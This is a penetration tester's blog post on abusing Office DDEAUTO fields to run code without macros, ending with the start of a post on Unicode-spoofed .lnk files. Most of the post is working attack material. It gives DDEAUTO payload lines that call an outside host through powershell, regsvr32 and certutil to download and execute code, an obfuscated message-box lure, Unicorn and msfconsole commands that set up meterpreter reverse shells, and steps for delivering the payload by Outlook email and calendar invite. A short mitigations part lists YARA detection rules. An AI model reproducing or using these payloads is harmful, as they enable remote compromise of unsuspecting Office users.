Office DDEAUTO attacks

Sensepost posted 10 days ago about a vulnerability which can trigger command execution, without use of macros, when someone opens a specially crafted Office document. Although a little bit of social-engineering needs to come in play for the victim to click ‘yes’ to the first 2 of 3 message boxes, most end-users are easily tricked. They found that by abusing the parameters of the DDEAUTO function that they could use powershell to download malicious payloads remotely. DDE is a legacy Inter-Process Communication (IPC) mechanism dating back to 1987, which establishes a dynamic data exchange (DDE) link with a document created in another Microsoft Windows-based program, (new information becomes available in a linked document, a DDE field inserts new information when you update the field). SensePost discovered that instead of specifying an application like Excel, an attacker can specify arbitrary parameters of another application as the first parameter, and quoted arguments as the second parameter (which cannot exceed 255 bytes).

Although Sensepost just demonstrated this using Word, they left other ideas up to the reader. There has been other ways being thrown around on Twitter over the past week, on a bunch of ways to accomplish code execution in Word, Excel, and even Rich-Text based Outlook emails. I’ll go over some of the items I have been able to test successfully in my lab.

The quick and easy test:
Open new word document, press CTRL+F9 key, and paste this between the {} brackets then save the file
DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

You should have something similar that looks like the image above.

Payloads:
Although popping calc is cute and all for demo purposes, you can do more mischievous things to execute malicious payloads on a target system.

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -w hidden -nop -ep bypass Start-BitsTransfer -Source "http://willgenovese.com/hax/index.js"; -Destination "index.js" & start c:\\Windows\System32\cmd.exe /c cscript.exe index.js"

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://willgenovese.com/hax/calc.sct scrobj.dll "

DDEAUTO c:\\windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://willgenovese.com/hax/test.exe && test.exe"

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1');powershell -e $e "

I’ve also created a bash script that uses CactusTorch to automatically generate reverse TCP/HTTP/HTTPS meterpreter payloads in vbs/hta/js that you can insert into Word documents for testing. https://github.com/xillwillx/CACTUSTORCH_DDEAUTO

Also I’ve seen in the wild that you can you can obfuscate the messagebox contents furthering your social-engineering attempts to trick the user into clicking yes.
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On"

Although powershell webdl scripts are easier to do you might want to have your payload all in one document so its not calling out for your binary over the network. Dave Kennedy updated his Unicorn python script to generate a msfvenom meterpreter payload that gets base64 encode/decoded when the DDEAUTO is triggered. Dave recently updated some fixes I sent to him along with the way obfuscate the messageboxes.
Open a console in Kali

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
git clone https://github.com/trustedsec/unicorn.git && cd unicorn
python unicorn.py windows/meterpreter/reverse_https $IP 443 dde
cat powershell_attack.txt  | xclip -selection clipboard | leafpad powershell_attack.txt 

Paste your cat'd payload into Word and save it, then to send to your target. Then in a new console window open your metereter handler to recieve some shells.

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false;exploit -j -z"

* if you need your external IP change the first line of code to:
IP="$(dig +short myip.opendns.com @resolver1.opendns.com)"

Outlook:
You can also trigger this with an Outlook Rich Text email message, the only caveat on Outlook 2013/2016 being that you need to embed an image/chart/object into it first before adding the DDEAUTO payload.
Open new word document, press CTRL+F9 key, and paste your payload between the {} brackets, then open a new Outlook email message. Go to the Format Text tab and change the message to Rich Text formatting.

In the body of the message copy and paste any image into the body.

From your Word Document copy your DDEAuto payload, then paste that into the body of the email. Enter the recipient etc and send. You'll get the DDE messages, just say no to them. When your recipient receives the email, it wont trigger until they press reply. If they press yes to the first 2 messageboxes then it'll execute your payload.

Calendar Invites:
Another attacker vector would be recurring Calendar invites. Every time the target opens it they get re-owned.

Mitigations:
This has been tested to work on doc(x/m), dot(x/m), rtf, Word xml, draft msg & oft files. Although the underlying parsing using Word triggers this behavior when these file types are opened. Microsoft responded that it is a feature and no further action will be taken to fix (unless of course the current ransomware attacks and other viruses force their hand).
wdormann made a quick .reg gist hack that will help disable DDEAUTO in the registry, although it does break some things in OneNote.

Nviso made some YARA rules to detect DDE also

// YARA rules Office DDE
// NVISO 2017/10/10 - 2017/10/12
// https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
  
rule Office_DDEAUTO_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?/
  condition:
    $a
}
  
rule Office_DDE_field {
  strings:
    $a = /.+?\b[Dd][Dd][Ee]\b.+?/
  condition:
    $a
}
 
rule Office_OLE_DDEAUTO {
  strings:
    $a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a
}
 
rule Office_OLE_DDE {
  strings:
    $a = /\x13\s*DDE\b[^\x14]+/ nocase
  condition:
    uint32be(0) == 0xD0CF11E0 and $a

tricky.lnk – Unicode Text Spoofing

Collaborative editing can quickly become a textual rap battle fought with increasingly convoluted invocations of U+202a to U+202e

Bidirectional Unicode spoofing is not a new concept, malware has been using the technique for the last decade, but I was toying around with unicode earlier today for a phishing engagement, by default Win7 doesn’t allow you to create filenames with unicode chars unless you:

    a. Open RegEdit
    b. Navigate to HKey_Current_User/Control Panel/Input Method
    c. Set REG_SZ “EnableHexNumpad” to be “1” (If there is no EnableHexNumpad, then add it and set its value to 1).
    d. Reboot your system.

I didnt want to do this so I created a .vbs script that creates a .lnk file that spoofs the file extension with Unicode chars. This allows you to reverse the “.lnk” file extension, append “.txt” to the end and change the icon to notepad.exe’s icon to make it appear as a text file. When executed, the Target payload is a powershell webdl and execute. Continue reading